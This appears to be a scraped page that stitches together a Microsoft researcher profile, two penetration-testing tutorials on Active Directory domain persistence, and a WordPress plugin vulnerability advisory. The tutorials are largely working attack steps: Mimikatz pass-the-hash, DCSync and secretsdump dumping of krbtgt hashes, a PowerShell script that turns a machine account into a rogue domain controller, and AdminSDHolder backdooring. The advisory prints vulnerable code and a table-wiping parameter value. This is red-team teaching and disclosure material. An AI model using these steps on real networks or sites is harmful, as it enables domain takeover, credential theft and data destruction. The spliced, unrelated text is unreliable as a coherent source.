For some of you, Warfield’s back story may seem familiar. He didn’t have a lot of money growing up. His family was poor. Warfield squeezed every minute out of free AOL discs that would arrive in the mail. He stumbled upon internet forums teaching him how to generate fake credit card keys. This allowed him to enjoy his free internet ride a little longer. Moments like this unlocked a curiosity within Warfield. At 12 years old, he understood how software and internet services worked. Once, he discovered the superuser password in a BBS software package to help procure more download time. Warfield loved playing Wolfenstein 3D. He knew if he continued to push the limits, he could get whatever he wanted.

Growing up on the island of Oahu, Warfield stood out. He found solace on his computer. He became the target of bullies, which he had no time for. He retaliated by creating a three-hour pager “bomb” which flooded his targets with pages. Another time it was an email spam campaign aimed at his high school faculty. Eventually, it would all come to an end in the form of expulsion. This was his wakeup call. Warfield felt the pull of computers leading him off the island. His father on the other hand, suggested he get a job at Taco Bell. Warfield declined. Instead, he channeled his father’s strong work ethic. There were limited opportunities for IT on the islands, but it didn’t stop him from finding work. One of his first roles was working phone support for a dialup ISP. He saved his money and landed in Seattle doing tech support for F5 Networks. These jobs would lay his foundation for helping others.

Warfield’s tenure at MSRC was an interesting period; both for him and the cybersecurity industry. He remembers back when the Shadow Brokers leaked Eternal Blue, which led to the WannaCry attack. Warfield was in his office on the Redmond campus when news of the leak broke. He and another co-worker helped sound the alarm. This was a galvanizing moment for the security response team. “Everyone came together immediately; researchers, analysts, coders.” Warfield recalled. Fueled by pizza and caffeine, engineers across the company worked into the evening to confirm the vulnerabilities in the leak were addressed in the latest patches. Warfield’s responsibility was to quickly ascertain the payloads didn’t contain any additional or unknown exploits.

**“It was cool to see a bunch of people across Microsoft immediately come together, focused on the mission, and succeed at the mission at hand, which was figuring out what was in there.”**

Although it was a highly stressful, and challenging period, Warfield was left feeling proud of how the company unified and rallied to address the leak and get guidance out to customers.

The Security Servicing Criteria for Windows is another point of pride for Warfield. The impetus for its creation came in part from community feedback. Researchers needed better guidance to understand which boundaries and features qualified for servicing and bounties. Microsoft’s Matt Miller kicked off the project and helped connect teams from across the company to participate. Warfield then helped author and publish the document that provided transparency with the research community, aligning internal and external people in a way that hadn’t existed until then. The project was a success. Warfield remembers feeling a great sense of accomplishment. The industry responded positively with an acknowledgement of his work and a tip of their hats.

**“It was kind of cool to say, this information didn’t exist 5 years ago. And now it does because I worked with a bunch of people, and we got it out there.”**

Warfield attributes his growth to mentors he’s had along the way. He learned the power of human connection and engaged with the research community to hear the candid feedback about the challenges. He took the onus to streamline the researcher engagement processes. He leaves behind a positive legacy for his desire to serve those in need. This human connection also went further than just emailing or tweeting him. Warfield was intentional about meeting new people in the community at hacker conventions. From chatting over food and drinks, to hallway chats, he made himself available to connect with anyone who came his way.

Helping people is a part of Warfield’s DNA and a driving force behind the work he does today. While he has never officially submitted a bug, Warfield has been instrumental in supporting hundreds of security researchers and their success. During his time in MSRC, he leaned in on his background in network engineering to help secure the Internet in a different way: cloud network security research. Inspired by a 2016 blog on Redis servers, Warfield began working with the Azure team to help identify compromised virtual machines and coordinate notifications to affected customers. Leveraging tools like Shodan and GreyNoise, he began presenting his techniques and lessons learned at hacker conferences to educate people about the risks of common security mistakes. This same skillset prepared him for a challenge no one saw coming; defending the critical infrastructure of healthcare.

Early in the pandemic, hospitals became the target of ransomware attacks. Ohed Zaidenberg, a cyber intelligence researcher reached out to Warfield via Twitter. They formed a coalition called the Cyber Threat Intelligence League (CTI). He put out the call and hundreds of security researchers and practitioners joined the league. Together they were able to accomplish their mission to keep hospitals secure and teach them how to defend themselves from cyber threats. All the researchers are volunteers. Warfield describes the league as something he is most proud of professionally. Check out Wired’s The Cyber-Avengers Protecting Hospitals from Ransomware. The work he and his colleagues are doing, give him hope for a brighter, safer, future for his children and the world at large. His personal joys come from being a father, snowboarding and traveling the globe spending time with his hacker family. Follow Nate on Twitter at @n0x08.

Researcher Spotlight: Cyber Viking Nate Warfield is Here to Help

Machine accounts play a role in red team operations as in a number of techniques are utilized for privilege escalation, lateral movement and domain escalation.… 
Continue reading → Domain Persistence – Machine Account

Machine accounts play a role in red team operations as in a number of techniques are utilized for privilege escalation, lateral movement and domain escalation. However, there are also cases which a machine account could be used for establishing domain persistence. This involves either the addition of an arbitrary machine account to a high privilege group such as the domain admins or the modification of the “_userAccountControl_” attribute which transforms a computer account to a domain controller. In both scenarios a red team operator could authenticate as the machine account (since the password is known) and perform elevated operations such as DCSync to retrieve all the domain hashes.

Sean Metcalf was the first person who disclosed publicly how machine accounts could be used as a backdoor for domain persistence by adding them to high privilege groups. This method is identical to standard user accounts which are added to domain admins group. In 2020 Stealthbits released an article which demonstrated an alternative method of persistence which involves how active directory replication can be utilized from a computer account. Even though that dumping passwords hashes via the DCSync technique is not new and SOC teams might have proper alerting in place, using a computer account to perform the same technique might be a more stealthier approach.

**userAccountControl**

By default standard users on a domain are allowed to create up to 10 machine accounts which is specified by the _ms-DS-MachineAccountQuota_ attribute. Creation of computer accounts is trivial and can be conducted by a number of tools both from domain joined and non-domain joined hosts. However, in order for a computer account to appear as a domain controller the _userAccountControl_ attribute needs to have the value of 0x2000 = ( SERVER\_TRUST\_ACCOUNT ). The 0x2000 is a hex number which in decimal is the number 8192. Modification of this attribute requires domain administrator level privileges. The image below represents how the attribute could be modified from the perspective of Active Directory.

Various tools exist which can create a machine account from the command line or from an implant such as StandIn, SharpMad and PowerMad. From a PowerShell console executing the following command will create a new machine account on the domain.

Import-Module .\\Powermad.psm1
New-MachineAccount -MachineAccount Pentestlab -Domain purple.lab -DomainController dc.purple.lab

PowerMad – Create Computer Account

This new computer will have a primary group id of 515 which is the RID for domain groups and represents that this is a domain computer. Modification of the _userAccountControl_ attribute will change the primary group id of the computer. Therefore if that attribute is modified to have a value of 8192 the primary group id will change to 516 which belongs to domain controllers (writable).

Get-ADComputer Pentestlab -pro \* | Select-object name, primarygroupid, useraccountcontrol
Set-ADComputer Pentestlab -replace @{ "userAccountcontrol" = 8192 }

Modify userAccountControl

Since the password of the computer account is known its NTLM hash could be used with Mimikatz to pass the hash. A new command prompt will open under the context of the machine account.

    privilege::debug
    sekurlsa::pth /user:Pentestlab /domain:purple.lab /ntlm:58a478135a93ac3bf058a5ea0e8fdb71

Mimikatz – Pass the hash

The most important bit of having a computer account to act as a domain controller is that the DCSync can be used on that arbitrary account instead of the legitimate domain controller. From detection point of view this can create a security gap which could be leveraged to use a common technique and remain undetected. During hash dumping typically the accounts of interest are domain admins and the _krbtgt_ account which allows the creation of a Golden ticket.

    lsadump::dcsync /domain:purple.lab /user:krbtgt

Mimikatz DCSync

Alternatively using the credentials of the machine account _secretsdump_ from Impacket suite can be utilized to retrieve the password hashes of the domain.

    python3 secretsdump.py purple.lab/Pentestlab\$:Password123@10.0.0.1 -just-dc

Secretsdump DCSync

Stealthbits released in their official repository a PowerShell script called ServerUntrustAccount which can be used to automate the technique of domain persistence via modification of the _userAccountControl_ attribute. Execution of the function “_Add-ServerUntrustAccount_” will add a new computer account on the network with a defined password. Furthermore, the _DS-Install-Replica_ privilege will be given to the account and the _userAccountControl_ attribute will be modified.

Add-ServerUntrustAccount -ComputerName "Pentestlab" -Password "Password123" -Verbose

Add-ServerUntrustAccount

The “_Invoke-ServerUntrustAccount_” can be used with the credentials of the account that has been created and the Mimikatz path on the disk in order to dump the hashes of the _krbtgt_ account to validate the domain persistence.

Invoke-ServerUntrustAccount -ComputerName "Pentestlab" -Password "Password123" -MimikatzPath ".\\mimikatz.exe"

Invoke-ServerUntrustAccount – DCSync krbtgt Hash

The hash of the domain administrator account is also valuable if the goal is to re-establish a direct connection with the domain controller. The script could be modified to target that account in order to retrieve the hash.

Invoke-ServerUntrustAccount – DCSync Administrator Hash

The hash of the domain administrator account could be used with _wmiexec_ from Impacket suite in order to establish a direct communication channel with the domain controller.

    python3 wmiexec.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71 Administrator@10.0.0.1

wmiexec – Domain Control Access

Automation of the technique is trivial since two PowerShell cmdlets are actually executed on the background. The following script will create a new active directory computer which some of it’s properties will pre-populated with the values which are specified and then the _userAccountControl_ attribute will modified so the account to appear as a domain controller.

function Execute-userAccountControl
{
\[CmdletBinding()\]
        param
        (
                \[System.String\]$DomainFQDN = $ENV:USERDNSDOMAIN,
                \[System.String\]$ComputerName = 'Pentestlab',
                \[System.String\]$OSVersion = '10.0 (18363)',
                \[System.String\]$OS = 'Windows 10 Enterprise',
                \[System.String\]$DNSName = "$ComputerName.$DomainFQDN",
$MachineAccount = 'Pentestlab'
        )
$secureString = convertto-securestring "Password123" -asplaintext -force
$VerbosePreference = "Continue"

Write-Verbose -Message "Creating Computer Account: $ComputerName"
New-ADComputer $ComputerName -AccountPassword $securestring -Enabled $true -OperatingSystem $OS -OperatingSystemVersion $OS\_Version -DNSHostName 
$DNSName -ErrorAction Stop;
Write-Verbose -Message "$ComputerName created!"
Write-Verbose -Message "Attempting to establish persistence."
Write-Verbose -Message "Changing the userAccountControl attribute of $MachineAccount computer to 8192."
Set-ADComputer $MachineAccount -replace @{ "userAccountcontrol" = 8192 };
Write-Verbose -Message "$MachineAccount is now a Domain Controller!"
Write-Verbose -Message "Domain persistence established!You can now use the DCSync technique with Pentestlab credentials."
$VerbosePreference = "Continue"
}

Execution of the script will provide the following output in the console and the computer can be used to perform the DCSync technique.

Import-Module .\\userAccountControl.ps1
Execute-userAccountControl

userAccountControl Automation – PowerShell

**Privilege Group**

Machine accounts could be also added to privileged groups for establishing domain persistence. Executing the following command will obtain the active directory groups which domain administrators belong.

Get-ADGroupMember "Administrators"

Get-ADGroupMember Administrators

From an elevated command prompt executing the command below will add the machine account _Pentestlab$_ to the group of Domain Admins.

    net group "Domain Admins" Pentestlab$ /add /domain

Add Machine Account to Domain Admins

Examining the “_Member Of_” tab of the computer account properties can verify that the account has been added into the Domain Admins group.

Domain Admins Group – Machine Account

Since the account has the required privileges it could be used directly with _secretsdump_ to retrieve active directory password hashes.

    python3 secretsdump.py purple.lab/Pentestlab\$:Password123@10.0.0.1 -just-dc-user krbtgt

Machine Account – DCSync krbtgt hashes

**YouTube**

**References**

*   https://gist.github.com/netbiosX/089a9d97a4f60016a6935500f328c17c
*   https://stealthbits.com/blog/server-untrust-account/
*   https://github.com/STEALTHbits/ServerUntrustAccount
*   https://adsecurity.org/?p=2753

**Post navigation**

Domain Persistence – Machine Account

Utilizing existing Microsoft features for offensive operations is very common during red team assessments as it provides the opportunity to blend in with the environment… 
Continue reading → Domain Persistence – AdminSDHolder

Utilizing existing Microsoft features for offensive operations is very common during red team assessments as it provides the opportunity to blend in with the environment and stay undetected. Microsoft introduced “_AdminSDHolder_” active directory object to protect high privilege accounts such as domain admins and enterprise admins from unintentional modifications of permissions as it is used as security template. Active directory retrieves the ACL of the “_AdminSDHolder_” object periodically (every 60 minutes by default) and apply the permissions to all the groups and accounts which are part of that object. This means that during red team operations even if an account is detected and removed from a high privileged group within 60 minutes (unless it is enforced) these permissions will be pushed back.

In the event that a domain has been compromised a standard user account can be added into the access control list of the “_AdminSDHolder_” in order to establish domain persistence. This user will acquire “GenericAll” privileges which is the equivalent of the domain administrator. This technique is not new as it has been presented initially by Sean Metcalf during DerbyCon in 2015. The implementation of the attack is trivial from an elevated PowerShell console by executing the following PowerView module:

    Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName pentestlab -Verbose -Rights All

AdminSDHolder – Modification

After 60 minutes the changes in the permissions will be applied and the module “_Get-ObjectAcl_” can be used to validate that the user “_pentestlab_” has “_GenericAll_” active directory rights.

    Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'pentestlab'}

AdminSDHolder – GenericAll Privileges

Changes in ACL will propagate automatically after 60 minutes. This is due to the Security Descriptor propagator (SDProp) process that runs every 60 minutes on the Principal Domain Controller (PDC) emulator and populates the access control list with the security permissions that exist in the AdminSDHolder for groups and accounts. However, these could be forced by modifying the DN as it can be seen below using the “_ldp.exe_” utility.

AdminSDHolder – Modify DN

Alternatively modification of a specific registry key on the domain controller can reduce the time interval of the SDProp to 3 minutes (12c hexadecimal value). It should be noted that Microsoft doesn’t recommend the modification of this setting as this might cause performance issues in relation to LSASS process across the domain.

    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /V AdminSDProtectFrequency /T REG_DWORD /F /D 300

From the perspective of Active Directory it is visible that the user “_pentestlab_” has been added at the “_AdminSDHolder_” object by looking on its Properties.

AdminSDHolder – Properties

Groups and accounts which are part of the “_AdminSDHolder_” container will have the “_adminCount_” attribute set to 1. This flag indicates that permissions from that container will be copied in 60 minutes across the domain even if privileges are modified.

AdminSDHolder – adminCount

Since the user has the required permissions it can be added to the “_Domain Admins_” group.

    net group "domain admins" pentestlab /add /domain

Add user to Domain Admins Group

Executing the command below will verify that the domain controller is now accessible and domain persistence has been established.

    dir \\10.0.0.1\c$

AdminSDHolder – DC Access

**References**

*   https://adsecurity.org/?p=1906
*   https://www.harmj0y.net/blog/redteaming/abusing-active-directory-permissions-with-powerview/
*   https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence

**Post navigation**

Domain Persistence – AdminSDHolder

Cross-Site Request Forgery (CSRF) vulnerability in WebFactory Ltd. WP Reset PRO plugin <= 5.98 versions.

_There was a critical security vulnerability in the WP Reset PRO plugin which allowed any authenticated user to wipe the database._

**Do you want to be the first to be alerted about such vulnerabilities? Sign up for Patchstack Community (Free) plan and monitor up to 99 websites for free.**

**For plugin developers, we have security audit services and Threat Intelligence Feed API for hosting companies.**

The PRO version of the WP Reset plugin (versions 5.98 and below) suffers from a vulnerability that allows any authenticated user, regardless of their authorization, to wipe the entire database.

Because it wipes all tables in the database, it will restart the WordPress installation process which could allow an attacker to launch this installation process and then create an administrator account at the end of this process as by default an administrator account has to be created once the WordPress site has been installed.

After this, they could further exploit the site by uploading a malicious plugin or uploading a backdoor.

The plugin is described as a plugin that helps you to quickly reset the site’s database to the default installation values without modifying any files. It deletes all customizations and content or just chosen parts like theme settings.

The described issue was fixed in version 5.99 after a rapid response (within 24 hours!) by the developer team of the plugin in question.

**The security vulnerability in WP Reset PRO plugin**

The issue in this plugin is caused due to a lack of authorization and nonce token check. The plugin registers a few actions in the _admin\_action\_\*_ scope. In the case of this vulnerability, it’s _admin\_action\_wpr\_delete\_snapshot\_tables_.

Unfortunately, the _admin\_action\_\*_ scope does not perform a check to determine if the user is authorized to perform said action, nor does it validate or check a nonce token to prevent CSRF attacks.

This action is registered as follows:

    add_action('admin_action_wpr_delete_snapshot_tables', array($this, 'delete_snapshot_tables'));

The function delete\_snapshot\_tables looks like the following:

    function delete_snapshot_tables($uid = '')
    {
        global $wpdb;
    
        if (empty($uid)) {
            $uid = $_GET['uid'];
        }
    
        if (strlen($uid) != 4 && strlen($uid) != 6) {
            return new WP_Error(1, 'Invalid UID format.');
        }
    
        $tables = $wpdb->get_col($y = $wpdb->prepare('SHOW TABLES LIKE %s', array($uid . '\_%')));
        foreach ($tables as $table) {
            $wpdb->query('DROP TABLE IF EXISTS `' . $table . '`');
            if ($wpdb->last_error !== '') {
                $this->log('error', 'Failed to delete table ' . $table . ': ' . $wpdb->last_error);
            } else {
                $this->log('info', 'Deleted table ' . $table);
            }
        }
    
        if (!empty($_GET['redirect'])) {
            wp_safe_redirect($_GET['redirect']);
        }
    
        return true;
    }

  
It can be seen that the _uid_ query parameter is grabbed from the URL, which is directly used as a prefix of the tables that should be deleted. Since the LIKE operator is used, we can pass a query parameter such as _%%wp_ to delete all tables with the prefix wp.

Once this is done, someone could simply visit the homepage of the site to start the WordPress installation process.

**The patch in WP Reset PRO**

Since this is a premium plugin, the patch cannot be seen at the WordPress.org SVN repository.

Based on our own research and communication with the development team of the WP Reset PRO plugin, we can confirm that an authentication and authorization check has been added using the current\_user\_can function, along with a check to determine if a valid nonce token is present in the request using the check\_admin\_referer function.

In addition to this, the _uid_ query parameter is also checked and made sure that it’s a string only containing letters using the ctype\_alpha function.

**Timeline**

**27-09-2021** – We discovered the vulnerability in WP Reset PRO and released a virtual patch to all Patchstack paid version customers.  
******27-09-2021****** – We reached out to the developer of the plugin.  
******28-09-2021****** – The developer replied and we provided the vulnerability information.  
******28-09-2021****** – The developer released a new plugin version, 5.99, which fixes this issue.  
******10-11-2021****** – Published the article.  
**10-11-2021** – Added the vulnerability to the Patchstack vulnerability database.

Websites with Patchstack paid version are protected from the issue and have received a virtual patch.

Tag

#backdoor